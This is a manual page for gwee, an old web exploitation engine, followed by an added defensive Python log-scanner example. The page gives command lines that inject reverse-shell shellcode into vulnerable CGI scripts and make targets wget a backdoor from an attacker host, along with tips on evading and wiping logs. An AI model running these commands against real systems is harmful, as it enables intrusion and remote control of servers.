
FreeBSD Manual Pages
gwee(1)				Security tools			       gwee(1)

NAME
       gwee - generic web exploitation engine
       Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
       Perl and	Python shellcode and expertise by Sabu <sabu@sentinix.org>

SYNOPSIS
       gwee -h|-V
       gwee options url

DESCRIPTION
       gwee  (generic web exploitation engine) is a small program written in C
       designed	to exploit arbitrary command execution vulnerabilities in  web
       scripts,	such as	Perl CGIs, PHP,	etc. gwee is much like an exploit, ex-
       cept more general-purpose. It  features	several	 reverse  (connecting)
       shellcodes (x86 Linux, FreeBSD, NetBSD, Perl script (universal),	Python
       script (universal)), several methods  of	 injecting  (executing)	 them,
       built-in	http/https client and built-in server (listener) for receiving
       connections (and	remote shell) from injected shellcodes.	gwee  is  dis-
       tributed	 under	the  MIT  License. The Perl and	Python shellcodes were
       written by Sabu <sabu@sentinix.org>.

OPTIONS
       -h     Display help (you	can execute gwee without arguments too).

       -y string
	      The string to insert before the shellcode injection command
	      line. The shellcode is inserted between the values
	      of the -y	option and the -z option. In  POST  requests  (default
	      behaviour),  the -y and -z options go into the POST data,	not in
	      the URL. In GET and HEAD requests, the "-y <shellcode>  -z"  op-
	      tion  combination	 is  appended to the URL. If you need to add a
	      '?' you can do that either in the	URL or as the  first  char  of
	      the -y option.  By default, -y and -z are	empty.

       -z string
	      String  to  append after the shellcode injection command.	By de-
	      fault, the -z string is empty. An	example	usage of the -y	-z op-
	      tion combo would be:

	      $	gwee -H	-y '?testvar=' -z '|' target/cgi-bin/test.cgi

	      This will resolve into:
	      http://target/cgi-bin/test.cgi?testvar=perl -e "print <shellcode>"|

	      Of course, you could have done it this way too, same result:
	      $ gwee -z '|' 'target/cgi-bin/test.cgi?testvar='

	      $	gwee -y	testvar= -z '|'	target/cgi-bin/test.cgi

	      This will	resolve	into:
	      http://target/cgi-bin/test.cgi
	      POST data: testvar=perl -e "print	<shellcode>"|

       -G     Use HTTP GET instead of POST. This is not recommended since
	      nasty long tell-tale strings will end up in the access_log. In
	      order for the whole payload to fit into a 1024 byte GET request,
	      the shellcode is split up into 4 separate requests, all produc-
	      ing nasty logs.

       -H     Use HTTP HEAD instead of POST/GET. Read about -G; the same nasty
	      logs will appear on the target and the shellcode will be split
	      into 4 requests.

       -l your_ip_or_hostname
	      The  IP or hostname to have the shellcode	connect	back to. Host-
	      names will be resolved into IP numbers, since  that's  the  only
	      method used by the binary	shellcodes.

       -p port
	      The port to connect back to, default is 31337.

       -s #   Choose which shellcode to	install	on the target:

	      0	= Sabu's Perl shellcode	(default if -s is omitted)
	      1	= Linux	x86 binary
	      2	= FreeBSD x86 binary
	      3	= NetBSD x86 binary
	      4	= Sabu's Python	shellcode (the target must have	Python installed)

       -i #   Choose shellcode injection method:

	      0	= perl -e "print
	      1	= python -c "__import__(
	      2	= printf "<hex>"
	      3	= echo -ne "<hex>" (works only if target's /bin/sh is bash)

       -I prefix_path
	      Choose a prefix to the shellcode injection method, e.g.:
	      -i1 -I /usr/local/bin/
	      which would be parsed into: /usr/local/bin/python -c... The de-
	      fault is empty (the preferred way).

       -T /var/tmp/.vetx.95
	      Choose a different temporary filename for	the shellcode/backdoor
	      on the target than the default.

       -a user agent string
	      Choose user agent	string,	e.g.:
		 -a "Mozilla/4.0 (compatible; MSIE 6.0;	Windows	NT 5.0)"
	      If  -a  is  omitted, gwee	will randomize from 25 real user-agent
	      strings.

       -v     Be really	verbose, disclose exactly which	commands are being ex-
	      ecuted.

       -q     Be really	silent,	only output error messages, nothing else.

       -L     Run built-in tcp listener	(no need to use	"nc -l").

       -A     Only  listen  for	 incoming connection on	-p port, nothing else.
	      This is just like: nc -l -p port -w timeout

       -t seconds
	      Time-out in seconds until	listener (-L) times  out.  Default  is
	      -t30 (30 seconds), -t0 means no time-out.

       -f     Non-interactive; you don't need to press return to proceed.

       -w http://home.of.attacker/reverse_shellcode
	      If you specify the -w option, the	 injection  methods  won't  be
	      used.  Instead "wget -Yoff -q -O <bd> <url>" will	be executed on
	      the target to download a reverse shellcode/backdoor that will
	      consequently be executed as per usual. Use the -d option to dump
	      a	shellcode that you can upload somewhere.

       -d outfile
	      This option will dump shellcode instead of  injecting  it	 some-
	      where. You use the -l -p and -s options as usual,	but instead of
	      connecting somewhere, the	generated shellcode will be dumped  to
	      a	file you specify after the -d. Upload this file	to a webserver
	      and use its URL with the -w option. For example, this command
	      will dump	x86 Linux sishell:
	      $	gwee -lyourhostname. -p1337 -s1	-d bd
	      $	scp bd leet@host:/wwwroot/
	      $	gwee -w	http://host/bd -LG -p1337 'target/cgi-bin/vuln.cgi?'

       -P     Preserve	the  shellcode	after injection. Normally, the exploit
	      will send a HTTP POST, HEAD or GET request trying to execute "rm
	      -f /var/tmp/.vetx.95". This will leave nasty logs even after you
	      wipe yourself from the logs. If you know you'll get a shell on a
	      box,  use	 the -P	option with the	-L option. Once	connected with
	      -L, it'll	automatically send a "shred -fu	; rm -f" over the con-
	      nected socket.

       -r     Remove  created backdoor file (shellcode)	on the target. This is
	      done automatically, but you still	have the choice	to  explicitly
	      do a remove.

EXAMPLES
       gwee -y 'q=%3B' -l fubar.org. -p	6666 -L	https://target/cgi-bin/vuln.cgi
       gwee -y'?cmd=' -z'|' -G -l mydom.tld -p 9000 -s1	-i3 -Lf	target/vuln.pl
       gwee -y'loginname=%3B' -l mydom.tld -p80	-Lf https://target/userstat.pl
       gwee -A -p 6666 -t0 -q
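       A defender-side check for the access_log traces that the -G, -H, -w and
       -P descriptions above say this tool leaves, written as an added example
       that is not part of gwee or of this manual page. The signatures mirror
       the -i injection prefixes, the -w wget command and the default -T tem-
       porary file given above; the log lines are constructed, and the
       MIN_FLAGGED threshold is an assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Request-side traces from the man page: the -i injection prefixes, the -w wget fetch,
# the default -T temp file and the "rm -f" cleanup request.
GWEE_SIGNATURES = {
    "perl_print":    re.compile(r'perl\s+-e\s+"?print'),
    "python_import": re.compile(r'python\s+-c\s+"?__import__\('),
    "printf_hex":    re.compile(r'printf\s+"(?:\\x[0-9a-fA-F]{2})+'),
    "echo_hex":      re.compile(r'echo\s+-ne\s+"(?:\\x[0-9a-fA-F]{2})+'),
    "wget_fetch":    re.compile(r'wget\s+-Yoff\s+-q\s+-O\s+\S+'),
    "tmp_backdoor":  re.compile(r'/var/tmp/\.vetx\.95'),
    "cleanup_rm":    re.compile(r'\brm\s+-f\s+/var/tmp/'),
}
# Apache combined log format; quotes inside the request field are logged as \"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>(?:[^"\\]|\\.)*)" \d{3}')
MIN_FLAGGED = 2  # assumed threshold: one -G/-H run is split into 4 requests plus the cleanup

def classify_request(request_line):
    """Names of gwee signatures present after URL-decoding the logged request line."""
    decoded = unquote_plus(request_line).replace('\\"', '"')
    return [name for name, rx in GWEE_SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(text):
    """Return (hits, noisy_ips): flagged (ip, request, signatures) and repeat sources."""
    hits, per_ip = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        sigs = classify_request(m.group("req"))
        if sigs:
            hits.append((m.group("ip"), m.group("req"), sigs))
            per_ip[m.group("ip")] += 1
    return hits, sorted(ip for ip, n in per_ip.items() if n >= MIN_FLAGGED)

# Constructed sample log (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2004:12:00:01 +0200] "GET /cgi-bin/test.cgi?testvar=perl%20-e%20%22print HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/May/2004:12:00:02 +0200] "HEAD /cgi-bin/test.cgi?testvar=echo%20-ne%20%22%5Cx41%5Cx42%22 HTTP/1.0" 200 0 "-" "Mozilla/4.0"
203.0.113.7 - - [10/May/2004:12:00:05 +0200] "GET /cgi-bin/test.cgi?testvar=rm%20-f%20/var/tmp/.vetx.95%7C HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.4 - - [10/May/2004:12:01:00 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/May/2004:12:02:00 +0200] "POST /cgi-bin/vuln.cgi HTTP/1.1" 200 64 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    found, noisy = scan_access_log(SAMPLE_LOG)
    for ip, req, sigs in found:
        print(ip, sigs, req)
    print("sources with repeated injection traffic:", noisy)
```

       Only GET and HEAD requests put the payload in access_log; the default
       POST mode carries it in the request body, which a plain access_log does
       not record, so this check sees only -G/-H traffic and the cleanup re-
       quest.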

LICENSE
       gwee - generic web exploitation engine
       Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
       Perl and	Python shellcode and expertise by Sabu <sabu@sentinix.org>

       Permission is hereby granted, free of charge, to	any person obtaining a
       copy of this software and associated documentation  files  (the	"Soft-
       ware"),	to deal	in the Software	without	restriction, including without
       limitation the rights to	use, copy, modify, merge, publish, distribute,
       sublicense,  and/or  sell copies	of the Software, and to	permit persons
       to whom the Software is furnished to do so, subject  to	the  following
       conditions:

       The above copyright notice and this permission notice shall be included
       in all copies or	substantial portions of	the Software.

       THE SOFTWARE IS PROVIDED	"AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
       OR  IMPLIED,  INCLUDING	BUT  NOT  LIMITED  TO  THE  WARRANTIES OF MER-
       CHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN
       NO  EVENT  SHALL	 THE  AUTHORS  OR  COPYRIGHT HOLDERS BE	LIABLE FOR ANY
       CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN	 ACTION	 OF  CONTRACT,
       TORT OR OTHERWISE, ARISING FROM,	OUT OF OR IN CONNECTION	WITH THE SOFT-
       WARE OR THE USE OR OTHER	DEALINGS IN THE	SOFTWARE.

AUTHOR
       My name is Michel Blomgren. I'm an information security consultant spe-
       cializing in risk/vulnerability assessment and penetration testing with
       Cycom AB, www.cycom.se. I'm the developer of SENTINIX, a	GNU/Linux dis-
       tribution  designed  for	 monitoring,  intrusion	 detection, anti-spam,
       anti-virus and clustering. You may contact me by	sending	an  e-mail  to
       <michel@cycom.se>.  If you like to keep the conversation	private, fetch
       my  PGP public key on  http://www.cycom.se/misc/pubkeymichel.asc	 (886A
       7B17 1747 6C82 7A7E EAC0	A3F1 2943 101C 18FA).

SEE ALSO
       rrs(1)

gwee				   May 2004			       gwee(1)
